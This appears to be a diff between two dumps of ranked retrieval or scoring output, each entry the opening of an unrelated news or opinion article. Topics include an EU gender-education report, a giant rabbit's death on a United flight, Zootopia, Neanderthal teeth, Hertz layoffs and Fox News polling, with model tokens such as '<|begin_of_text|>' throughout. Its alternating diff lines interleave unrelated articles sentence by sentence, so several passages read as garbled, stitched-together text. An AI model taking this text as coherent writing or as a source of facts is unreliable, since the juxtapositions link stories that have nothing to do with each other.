stereotypes’. +Airline sources told The Sun that United was scrambling to find out what happened to Simon following his death — and that they now fear another potential PR disaster could be on the horizon. -They hope that girls will take up scientific and technical subjects while boys could take up activities such as cleaning the home. +“After the viral video no-one wanted responsibility for killing what was to be the world’s biggest rabbit,” a source said of the scandal-plagued airline. -MEPs have revealed they want boys to learn about traditionally ‘female’ activities and should be taught domestic work and care at school +Edwards — a great-grandmother and mother of ten who previously made headlines in the U.K. after she tried to use plastic surgery to transform herself into a real-life Jessica Rabbit from “Who Killed Roger Rabbit” — claimed Simon was on track to become the world’s biggest bunny before he died. His father, Darius, is the current record holder at 4-feet, 4 inches. -Textbooks showing old-fashioned stereotypes about male and female roles would also be thrown out of schools, under the European Parliament’ proposals. +United told The Sun that they were looking into Simon’s death. -The suggestions were made in the report on Empowering Girls Through Education from the Parliament’s FEMM Committee on Women’s Rights and Gender Equality, with MEPs approving the proposals by 408 to 236. +“We are reviewing this matter,” the airline said. -The report says it 'encourages girls and boys in the education process to take an equal interest in all subjects, beyond gendered stereotypes, in particular as regards scientific and technical subjects, including boys’ learning about activities regarded as female, in areas such as domestic work and care’. +Giant rabbits are known to cost more than $6,000 a month to keep, the Sun reports. -The Brussels politicians said they want to stand against ‘sexist’ education by encouraging children to take an equal interest in all subjects ‘beyond gendered stereotypes’ +According to the outlet, international flight regulations require that rabbits and other animals be transported in an area of the plane’s hold +================================================================================ +Rank = 77; Score = 127488.0 +<|begin_of_text|>When I first saw the trailer for Disney’s upcoming film, Zootopia, one of the things that struck me first (in addition to the HILARITY of the sloth DMV employee getting a joke) was the fact that, in this movie that seems to be about biases and bigotry, the lead was a female character! It was so clear that gender-related bias was one of the things this film was going to examine and challenge. After all, with Nick the fox saying “You bunnies. Always so emotional,” that had to be on purpose, right? Apparently not. -Another point says that schools should be guided ‘to embrace a gender perspective and gender equality, and to ensure the elimination of stereotypes and sexist distortions that textbooks and teaching materials may include in their content.' +In a recent interview with io9 the director of Zootopia, Byron Howard, tells the story of how originally, the main character of this film wasn’t supposed to be Judy Hopps, the police officer bunny, but Nick the con artist fox. Back in November 2014, after years of production, the team behind the film realized that the story didn’t make sense with Nick as the lead, even though that was the version of the story that was in the original pitch and the original script. Howard explains: -It added: '[This will then] encourage them also to combat this sexism in literature, film, music, games, media, advertising and other areas that can contribute decisively to changing the attitudes, behaviour and identity of girls and boys’. +We’re telling a story about bias, and when you have the Nick character starting the movie, through his eyes the city was already broken. He didn’t like Zootopia. We asked ‘What are we saying with the movie?’ If we’re telling this movie about bias—something that is everywhere and in all of us, whether we want to admit it or not—the character that’s going to help us tell that message is Judy, an innocent, [who comes] from a very supportive environment where she thinks everyone is beautiful, everyone gets along. Then let Nick, this character who knows the truth about the world, bop up against her and they start to educate each other. When we flipped that, it was a major flip, but it worked so much better. -Portuguese socialist MEP Liliana Rodrigues, who spearheaded the proposals, said: ‘We are still living in an unequal Europe…women continue to be a prime target for discrimination and violence. I believe that school plays a fundamental role in changing this. +That does, indeed, make a lot of sense. What’s interesting to me, though, is that nowhere in this rationale does it say “In this movie about bias, the character that’s going to help us tell that message is Judy, a female character who constantly faces bias herself.” Gender is mentioned nowhere in this interview. It’s so strange to me that making the female character the lead of a movie about biases wasn’t the original, obvious choice! What’s more, even after giving it thought, it seems like the fact that the character is female wasn’t the obvious thing that made them decide “you know what? She would be a +================================================================================ +Rank = 78; Score = 127488.0 +<|begin_of_text|>Photo: Michael Segalov -‘[We want to] create a school culture of gender equality, critically oversee the curricula and educational materials, ensure gender equality with regard to personal and professional decisions and improve the percentage of women in positions of responsibility.’ +Theresa May, Donald Trump, Brexit, an uptick of racism and hate crimes, rising inflation, increasing property prices and the floundering pound. A lot has happened this year that you probably want to forget about, and the traditional way to forget – of course – is to drown your memory in booze, and stifle any remaining thoughts with one or more of your favourite drugs. -But Leading Labour Eurosceptic MP Kate Hoey told The Daily Express: ‘I have confidence in our nation’s ability to deal with educating our own children. It is time for the EU to stop wasting money on interfering in matters that are none of their business.’<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> -================================================================================ -Rank = 81; Score = 272384.0 -<|begin_of_text|>SOME women would prefer a world where men don’t exist. Just picture it. No hogging the remote. No beard clippings in the sink. +But as you might have already surmised, that's not always the best course of action. Dr Sheri Jacobson, clinical director of Harley Therapy, points out that both drugs and alcohol actually provide a temporary high that, over a long-term basis, keeps the user in a cycle of low moods. -After all, it works for other species. Komodo dragons can reproduce without sex with a male partner. So can whiptail lizards, hammerhead sharks and parasitic wasps. And they seem happy enough. +"Alcohol, for example, is a depressant, and it actually messes with the neurotransmitters in your brain, including the one needed to help you keep anxiety at bay," she says. So while drinking is often thought of as a way to "wind down" after a demanding day, in fact it can have quite the opposite effect. -But researchers say there’s a very important evolutionary reason men exist and without them a hypothetical asexual all-female human race would likely become extinct. +"If you already had any kind of mental health issue, like anxiety or bipolar disorder, substances are likely to make your condition worse, not better," says Dr Jacobson. "And if you have a genetic risk for a mental disorder, drug or alcohol use gives you at a higher chance of developing it." -Professor Matt Gage from the University of East Anglia asked the question seven years ago: “Why should any species waste all that effort on sons?” +Drug and alcohol misuse is particularly prevalent in men. In 2014, men accounted for approximately 65 percent of all alcohol-related deaths in the UK, and in 2014-2015, 74 percent of hospital admissions with a primary diagnosis of drug-related mental and behavioural disorders were men. Depression and anxiety are common in individuals with a history of substance abuse, and the Journal of Clinical Psychiatry suggests that one in three adults who abuses drugs or alcohol is also affected by depression. -The answer, revealed this week, is more basic that you might think. +Male mental health might be more talked about than ever in the media, but last month the charities Mind and Rethink Mental Illness released a study from their campaign Time to Change showing that 54 percent of male teenagers suffering from mental health issues chose to keep their problems to themselves. Despite more and more celebrities outing themselves as sufferers of depression and anxiety, and media-run campaigns encouraging men to talk about what's troubling them, many are still keeping things to themselves. -“We wanted to understand how Darwinian selection can allow this widespread and seemingly wasteful reproductive system to persist, when a system where all individuals produce offspring without sex — as in all-female asexual populations — would be a far more effective route to reproduce greater numbers of offspring. +There are, of course, many reasons why that might be. But I'm personally aware of a number of men whose mental health problems have been clouded by pints, drugs, hangovers and comedowns +================================================================================ +Rank = 79; Score = 126976.0 +<|begin_of_text|>This list has been expanded into the new book, "Wired to Create: Unravelling the Mysteries of the Creative Mind," by Carolyn Gregoire and Scott Barry Kaufman. -His research, funded by the Natural Environment Research Council, showed competition among males helped produce the healthiest offspring and the absence of sex could lead to mutation among offspring and eventual extinction. +Creativity works in mysterious and often paradoxical ways. Creative thinking is a stable, defining characteristic in some personalities, but it may also change based on situation and context. Inspiration and ideas often arise seemingly out of nowhere and then fail to show up when we most need them, and creative thinking requires complex cognition yet is completely distinct from the thinking process. -“To be good at out-competing rivals and attracting partners in the struggle to reproduce, an individual has to be good at most things, so sexual selection provides an important and effective filter to maintain and improve population genetic health,” prof. Gage said. +Neuroscience paints a complicated picture of creativity. As scientists now understand it, creativity is far more complex than the right-left brain distinction would have us think (the theory being that left brain = rational and analytical, right brain = creative and emotional). In fact, creativity is thought to involve a number of cognitive processes, neural pathways and emotions, and we still don't have the full picture of how the imaginative mind works. -“Our findings provide direct support for the idea that sex persists as a dominant mode of reproduction because it allows sexual selection to provide these important genetic benefits. +And psychologically speaking, creative personality types are difficult to pin down, largely because they're complex, paradoxical and tend to avoid habit or routine. And it's not just a stereotype of the "tortured artist" -- artists really may be more complicated people. Research has suggested that creativity involves the coming together of a multitude of traits, behaviors and social influences in a single person. -“In the absence of sex, populations accumulate deleterious mutations through a ratcheting effect where each new mutation takes a population closer to extinction. +"It's actually hard for creative people to know themselves because the creative self is more complex than the non-creative self," Scott Barry Kaufman, a psychologist at New York University who has spent years researching creativity, told The Huffington Post. "The things that stand out the most are the paradoxes of the creative self... Imaginative people have messier minds." -What if there were fewer males? The researchers tested the theory that a more efficient form of reproduction would involve females giving birth to more females. +While there's no "typical" creative type, there are some tell-tale characteristics and behaviors of highly creative people. Here are 18 things they do differently. -To find out if that might work, researchers took tribolium flour beetles and paired them with different numbers of males. +They daydream. -Over 10 years they paired 90 males with only 10 females. They then paired single males and females in monogamous pairings. +Creative types know, despite what their third-grade teachers may have said, that daydreaming is anything but a waste of time. -“Our monogamous treatment, for example, where there was no sexual selection for 50 generations, resulted in a lower level of population health and rapid extinction when populations were challenged by inbreeding. All the populations derived from monogamous histories became extinct after just eight generations,” prof. Gage said. +According to Kaufman and psychologist Rebecca L. McMillan, who co-authored a paper titled "Ode To Positive Constructive Daydreaming," mind-wandering can aid in the process of "creative incubation." And of course, many of us know from experience that our best ideas come seemingly out of the blue when our minds are elsewhere. -By contrast, populations where males had to compete for female attention maintained population health and avoided extinction +Although daydreaming may seem mindless, a 2012 study suggested it could actually involve a highly engaged brain state -- daydreaming can lead to sudden connections and insights ================================================================================ -Rank = 82; Score = 272384.0 -<|begin_of_text|>Nothing is like anything else. You can do nothing well or you can do nothing badly. Some people excel at nothing. Others have more difficulty with it. They grow restless, resent the loss of initiative and control, and, more deeply, they feel that “something” is inherently, even morally, superior to nothing. +Rank = 80; Score = 126464.0 +<|begin_of_text|>Cultural criticism is taboo. In polite company, all cultures are created equally. None is better or worse than any other; they’re just different. We aren’t responsible for the culture we were born into, so there’s no objective basis for criticism or judgement. -The U.S. government national security apparatus, for better or for worse, sucks at nothing. In the policy process, the saying goes, something always beats nothing. As a bureaucratic fact, this is clearly true. But, from a policy perspective, is nothing always the wrong choice? +In progressive ideology, this idea goes a step further. Not only must we respect all cultural differences, we mustn’t stray outside the norms of the culture we were born into. A white woman with dreadlocks, for example, should respect black culture and shave her hair off, rather than “steal” a hairstyle from a different culture. They even have a special word for this grievance: cultural appropriation. -Currently, the Trump administration is engaged in something of a natural experiment on this question in eastern Syria. U.S. forces went to eastern Syria in 2014 to defeat ISIL. Now, with ISIL losing its last grip on territorial control in Syria, the foreign policy apparatus is reprising a time-honored tradition and asking itself what those forces should do next. The answer is unlikely to be nothing. +I think cultural appropriation is a load of baloney, based on the most persistent errors in political/social thought: abstraction errors – misunderstanding the relationship between people and labels, between aggregates and concretes. These errors are not only imprecise, but they are counter-productive, divisive, and downright dangerous. -In what is surely a dizzying array of internal meeting and papers, the debate centers on how the United States should leverage its military presence in Syria, which the Pentagon recently acknowledged exceeds 2,000 troops, to pursue other objectives, namely countering Iran’s influence or post-conflict stabilization, or both. Entering into that debate, Faysal Itani has argued in this journal that a “small-time” U.S. mission in Syria would be unable to effectively counter Iran, pointing to the “imbalance of commitment and interests between the United States and Iran” and the overwhelming numerical advantage of pro-Iran forces. He notes that the United States would need a force of many “tens of thousands of combat troops” in Syria to challenge Iran or contribute to the country’s reconstruction process. +Equal Equivocation -Consistent with U.S. government practice, Itani ignored the nothing option. He is certainly right about the limitations of the small U.S. force presently in Syria. But even a much larger force would stand a poor chance of rolling back — or even containing — Iranian influence in the war-ravaged country. The reason for this is the very “imbalance” on which Itani’s argument against a small force rests. Syria is simply not central to U.S. interests and, as such, Iran’s cost tolerance will far outpace that of the United States at almost any level of conceivable commitment. +The first abstraction error goes like this, “All differences between people are benign differences. Some people are born with light hair; others with dark hair. Neither is superior to the other. In the same way, all cultural differences are benign. Some cultures value monogamy; others are more sexually liberal. Neither is superior to the other.” -Bashar al-Assad’s continued rule is obviously undesirable, not least for his wanton abuse of the Syrian people. Iran’s -================================================================================ -Rank = 83; Score = 272384.0 -<|begin_of_text|>Gunshots heard and clashes seen at Jerusalem's al-Aqsa mosque on Friday when Israeli forces stormed the compound. (Saeed Qaq) +This concept is applied across the board. Some cultures are more religious; some value education more highly; some are more hierarchical, etc. These differences should not be judged, any more than we should judge somebody for their height or the amount of freckles on their face. -Clashes erupted in Jerusalem at the al-Aqsa mosque, known as the third-holiest site in Islam. +Then, the story goes, because all cultures are essentially equal, any differences in the socio-economic status of ethnic groups must be a function of discrimination. Without racism or discrimination, all cultures would be equally represented across the socio-economic spectrum. -Dozens gathered outside the mosque to protest Israel's ground invasion into Gaza, according to the International Business Times. Protesters then clashed with Israel Defense Forces after Friday prayers. +In reality, we’ve no reason to believe this is true. Nowhere in the world – nowhere in history – are all cultures represented equally across the socio-economic spectrum. The idea is an appealing, aesthetic one, no doubt, but it’s not grounded in the real world. -According to Israel Police spokesman Micky Rosenfeld, following Friday prayers at the mosque compound, about 200 to 300 masked youths caused disturbances by throwing stones at policemen stationed nearby. After 20 minutes of disturbances, police entered the compound and arrested seven people for rioting. +Different cultures value different things; some skills are valued more highly than others; throughout the world, Chinese immigrants tend to have the highest average income of any demographic. Why is this? It’s not because they are genetically superior; it’s not because of pro-Chinese discrimination (in fact, it’s largely despite negative discrimination); it’s because Chinese culture heavily emphasizes academic performance in the hard sciences, and the hard +================================================================================ +Rank = 81; Score = 125952.0 +<|begin_of_text|>Neanderthal communities divided some of their tasks according to their sex. This is one of the main conclusions reached by a study performed by the Spanish National Research Council (CSIC), published in the Journal of Human Evolution. This study, which analyzed 99 incisors and canine teeth of 19 individuals from three different sites (El Sidron, in Asturias -- Spain, L'Hortus in France, and Spy in Belgium), reveals that the dental grooves present in the female fossils follow the same pattern, which is different to that found in male individuals. -"We had been notified in advance that this was planned," said Rosenfeld, adding that Israel had imposed an age limit on people who could enter the compound, which Jews refer to as the Temple Mount and which Muslims call Haram al-Sharif, or holy sanctuary. Only men over age 50 and women were allowed in to pray on Friday, but Rosenfeld said that younger men had spent the night at the compound in preparation for the riots on Friday. +Analyses show that all Neanderthal individuals, regardless of age, had dental grooves. According to Antonio Rosas, CSIC researcher at the Spanish National Museum of Natural Sciences: "This is due to the custom of these societies to use the mouth as a third hand, as in some current populations, for tasks such as preparing the furs or chopping meat, for instance." -According to reports, 100 Israelis stormed the courtyard and used rubber bullets to disperse crowds. +Rosas specifies that "what we have now discovered is that the grooves detected in the teeth of adult women are longer than those found in adult men. Therefore we assume that the tasks performed were different." -RELATED: +Other variables analyzed are the tiny spalls of the teeth enamel. Male individuals show a greater number of nicks in the enamel and dentin of the upper parts, while in female individuals these imperfections appear in the lower parts. -Live blog: Israel continues to invade Gaza +It is still unclear which activities corresponded to women and which ones to men. However, the authors of the study note that, as in modern hunter-gatherer societies, women may have been responsible for the preparation of furs and the elaboration of garments. Researchers state that the retouching of the edges of stone tools seems to have been a male task. -Israel prepares to broaden Gaza offensive<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +Almudena Estalrrich, CSIC researcher at the Spanish National Museum of Natural Sciences, adds: "Nevertheless, we believe that the specialization of labor by sex of the individuals was probably limited to a few tasks, as it is possible that both men and women participated equally in the hunting of big animals." + +Rosas concludes: "The study of Neanderthals has provided numerous discoveries in recent years. We have moved from thinking of them as little evolved beings, to know that they took care of the sick persons, buried their deceased, ate seafood, and even had different physical features than expected: there were redhead individuals, and with light skin and eyes. So far, we thought that the sexual division of labor was typical of sapiens societies, but apparently that's not true ================================================================================ -Rank = 84; Score = 272384.0 -<|begin_of_text|>On the right track: DfT appoints two women to directors general job share for Rail Group. Credit: Lynne Cameron/PA +Rank = 82; Score = 125952.0 +<|begin_of_text|>Mass IT layoffs are often small and unnoticed. They are not on the scale of the Carrier air conditioning plant layoff; its Indianapolis facility, which currently employs 2,000 people, is moving to Mexico. -The Department for Transport has appointed two women to the civil service's first ever job share at director general level as successors to the DfT's newly appointed permanent secretary. +Hertz IT employees share two things with the Carrier workers: They were also angry, and they got the news on the same day, Feb. 10. -Polly Payne and Ruth Hannant will join the DfT as directors general for the department's Rail Group on 11 December from the Department for Education, filling the position left vacant when Bernadette Kelly was promoted to perm sec in April. +The Carrier layoffs arrived guillotine-like; the plant is closing, period. But IT layoffs are rarely like that. There are ambiguities and uncertainties and lifeboats for some, and so it was at Hertz. -Kelly said the pair would be role models not only for the civil service but also for the rail sector, where women make up just 11% of the workforce and senior leaders are "overwhelmingly male". +In an early morning conference call, Hertz's IT employees were told by the CIO the firm was expanding its outsourcing work with IBM. It wasn't known then how many would lose their jobs or ultimately be hired by IBM. -RELATED CONTENT +But one month later, this much is clear: About 300 Hertz IT employees, most located in Oklahoma City, were impacted by this decision. IBM is hiring about 75 and those workers are expecting to receive offers today. The layoffs will begin this month and be completed by May 31, said Hertz. It's not yet clear if all the 225 or so employees who are not receiving job offers from IBM will be laid off. -She told Civil Service World: “I’m proud that the Department for Transport is leading the way with the first job share partnership at this level in government. And I’m especially pleased that we have Polly and Ruth joining us to lead our work on rail. +After the conference call, employees were stunned. The reaction was, "We're screwed," said an IT employee, one of two interviewed, who requested his name not be used. -"We are investing in the biggest rail modernisation for over a century, so there’s a huge amount to do." +There was "anger, resentment," especially by employees who "sacrificed that work/life balance to keep things going here," said the employee. -Kelly was DG for Rail Group from September 2015 to April 2017, when Nick Joyce took the post in an "acting" capacity. +Hertz took precautions. On the day that IT employees learned that their work was shifting to IBM, employees noticed Oklahoma sheriff patrol vehicles in the building's parking lot. They believed plainclothes officers were inside the building. -Rail Group is responsible for developing strategy and policy for the rail sector, managing expenditure on rail services and infrastructure, and oversees the delivery of rail franchises and major projects – including Crossrail and Thameslink. +Hertz explained the security decision. "We consider the safety and security of our people whenever there are circumstances or events that could increase the risk of a disturbance or some form of workplace violence," said Bill Masterson, a Hertz spokesman. -It sponsors British Transport Police, Network Rail, the Office of Rail and Road, the Rail Accidents Investigation Branch and Transport Focus. +"Knowing that this was a difficult announcement, we had additional security on hand," said Masterson. This security was in place from Wednesday Feb. 10 through Friday, Feb. 12. -Payne and Hannant were already in a job-share partnership with each other working on higher education reform in DfE, and have both previously worked for the former Department for Business, Innovation and Skills and theTreasury. Former BIS permanent secretary Martin Donnelly described the pair as an "outstandingly effective job share", during an interview with Civil Service World earlier this year. +There were two opinions about the security, said the employees. Some saw it as prudent, while others thought it a sign of distrust. There were no reported problems. -DfT said the appointment demonstrated the government's commitment to increasing the number of women working in the rail sector. The Transport Infrastructure Skills Strategy, published in 2015, included an aim for women to make up 20% of DfT's science and technical apprenticeships by 2020, and 50% by 2030. +Once the initial shock passed, Hertz IT employees had to make difficult choices. -Kelly added: “Within the DfT we are making progress in encouraging diversity at every level, and earlier this year the department was recognised for our leadership on workplace gender equality by +Employees' severance packages range from four weeks to ================================================================================ -Rank = 85; Score = 272384.0 -<|begin_of_text|>Google unlawfully used technology from Oracle, Microsoft and others when creating its Android and Chrome operating systems, leaving its vendor partners exposed. Rather than engaging in expensive and often drawn out lawsuits, a majority of Android vendors have signed licensing agreements with patent holders. Microsoft has already signed licensing agreements with more than 20 Android manufacturers, including big-name players such as HTC, Samsung and LG. The company claims that 80% of Android smartphones sold in the U.S. and most devices sold throughout the world are now covered under its various agreements. +Rank = 83; Score = 125952.0 +<|begin_of_text|>Criticize cops involved in the G20 debacle? We can now expect to be arrested and face criminal prosecution. -Geoff Duncan at DigitalTrends estimates that if Microsoft averaged a royalty of $1 per each Android device, it could generate roughly $430 million in revenue this year. Microsoft is estimated to collect somewhere near $8 per device, however, meaning its royalty fees could total $3.4 billion in 2013. +Forget a civil defamation suit—two members of the Ontario Provincial Police, aided and abetted by the Crown Attorney’s office, have chosen the nuclear option, charging a Kitchener activist with criminal defamation. -As Android device shipments increase, so will Microsoft’s revenue. If half of the 1.5 billion Android devices that are estimated to ship worldwide in 2017 resulted in a royalty fee paid to Microsoft, the company could earn $5.9 billion dollars. Microsoft claims to earn royalties from a “majority” of Android vendors worldwide, though. Based on that information, if the company were to collect royalties from 75% of Android vendors in 2017, it could pull in an estimated $8.8 billion in additional revenue.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> -================================================================================ -Rank = 86; Score = 268288.0 -<|begin_of_text|>Fox News viewers really do see the world differently. +(More here. Needless to say, this latest assault on the right to dissent has not received much coverage in the corporate media.) -New data shows that Fox loyalists, when compared to the public at large, are far more pessimistic about America's future; are far more critical of President Obama's performance; are far more fearful of Hillary Clinton; and are more forgiving of Donald Trump. +From the Waterloo Record: + +Dan Kellar, 29, was recently charged with two counts of defamatory libel by officers in the OPP anti-rackets squad as he left his Kitchener home on a bicycle. He was also charged with counsel to assault one of the officers. Police allege he published comments likely to injure the reputation of the officers by exposing them to hatred, contempt or ridicule, or that were designed to insult the officers. …Kellar says the officers who arrested him are from the same unit that arrested other AW@L members and activists in connection with G20-related allegations. “The cop who arrested me is the one who’s making all the arrests for conspiracy cases,” he said. He said police agents began infiltrating activist groups before the summit. The two undercover officers joined AW@L [Anti-War at Laurier, a campus peace group], but were kicked out in the spring of 2010, before the summit, because activists didn’t feel comfortable around them, he said. …The defamatory libel charges were laid against Kellar after he put out a “community alert” on AW@L’s website, peaceculture.org. Kellar learned one of the officers had been spotted in Toronto, and, “sent out the warning…’suspected infiltrator police agent spotted in Toronto,’” he said. In the posting, he made comments police allege are defamatory. -The sharp differences in opinion extend to beliefs about political corruption, voter fraud and media coordination with campaigns. Fox fans, when compared to fans of other networks, are far more likely to express concern about November's election results being manipulated. +Here’s the Criminal Code provision, rarely invoked in this country—until now, I guess: -They are also more likely to agree with the sentiment that divisions in the United States are deeper than in the past. +298 (1) A defamatory libel is matter published, without lawful justification or excuse, that is likely to injure the reputation of any person by exposing him to hatred, contempt or ridicule, or that is designed to insult the person of or concerning whom it is published. Mode of expression (2) A defamatory libel may be expressed directly or by insinuation or irony (a) in words legibly marked on any substance; or (b) by any object signifying a defamatory libel otherwise than by words. -The data -- from a new national poll by Suffolk University -- shows deep divisions, indeed. And it demonstrates why 21st Century Fox patriarch Rupert Murdoch recently told the Wall Street Journal that it would be "business suicide" to change Fox's editorial direction. +Note +================================================================================ +Rank = 84; Score = 125440.0 +<|begin_of_text|>Jiub Basic Info Race Dunmer Gender Male Level 3 Location Imperial Prison Ship Health 60 Magicka 17 Class Thief Rank Saint Respawn No Ref ID jiub -Related: Rupert Murdoch speaks out about contract talks with Megyn Kelly +For other uses, see Jiub. -Overall, the poll finds that the country is split about Clinton, with 46% of all respondents having a favorable view of her versus 47% unfavorable. Among people who rate Fox News as their most-trusted source of news, however, sentiments are much more solidly anti-Clinton, with 84% viewing her unfavorably, versus just 13% favorably. +"I heard them say we've reached Morrowind. I'm sure they'll let us go." ―Jiub[src] -Similarly, 54% of all Suffolk respondents approve of President Obama's job performance, versus 41% who disapprove. But among Fox loyalists, the numbers are radically different, with 16% approving of the president's performance and 80% disapproving. +Jiub is a Dunmer prisoner who is encountered in the boat in which the Nerevarine is being taken to Morrowind. He later achieved sainthood, and hundreds of years later, his soul 